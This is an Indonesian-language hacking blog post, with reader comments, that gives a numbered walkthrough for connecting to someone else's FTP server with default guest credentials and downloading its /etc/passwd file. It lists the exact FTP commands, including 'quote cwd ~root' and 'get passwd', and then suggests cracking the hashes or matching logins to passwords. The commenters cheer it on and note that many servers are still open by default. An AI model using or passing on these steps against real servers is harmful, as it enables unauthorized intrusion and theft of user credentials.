Posted in Hacking

Hacking Shell via FTP


Gila men…!!! makin hari makin menggila aja para pengobrak-abrik mirc…kamu bisa bayangin aja hampir tiap hari terus bertambah cara-cara hacking di dunia maya…

Berikut ini adalah cara menghack menggunakan Windows, yang digunakan untuk mendapatkan password file dari sebuah shell. Cara ini menggunakan ftp protocol. Kebanyakan paswordnya id sembunyikan /shadowed, tapi kamu masih bisa mendapatkannya dg meng-finger atau menebak passwordnya untuk loginnya.

Kamu dapat memulainya dg membuka/memasuki sebuah shell, dan kamu tidak perlu/tidak harus menggunakan/ berada didalam sebuah ftp server. Berikut langkah-langkahnya :

1.jalankan prompt
2.Tuliskan command untuk membuka dos command prompt
3.tuliskan ftp server.to.hack.com (nama servernya!!)
4.Akan muncul prompt login.. tekan enter saja (tidak perlu menuliskan apa apa)
5.Akan muncul password login.. tekan saja enter…
6.sekarang ketiklah “quote user ftp” dan tekan enter
7.lalu ketik “quote cwd ~root” tekan enter
8.dan ketikan “quote pass ftp” tekan enter
Sekarang kamu sudah memiliki guest access dan dapat mendownload password file.. and have a fuckin’ shit with that
9.ketiklah “cd etc” tekan enter.. untuk mendapatkan -etc directory- yg berisi file password
10.ketiklah “get passwd” untuk mendownload passw.file ke HD mu

Sekarang kamu suda memiliki password file dan kamu dapat membukanya di C:passwd dengan menggunakan notepad. Jika file tersebut di enkripsi.. kamu bisa meng-crackernya.. dan jika tidak dienkripsi.. (You lucky) kamu dapat mencocokan antara user login dg passwordnya….

5 thoughts on “Hacking Shell via FTP

  1. maz….bagus bgt bisa ngasih cara buat jdi hacker kecil….tolong kasih tau buat mengetahui ftp Servernya

  2. kalo anonymousenya aksesnya udah ga default lagi sampe teler juga ga bakal masuk. tapi jangan menyerah masih banyak yang default kok hehehe

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s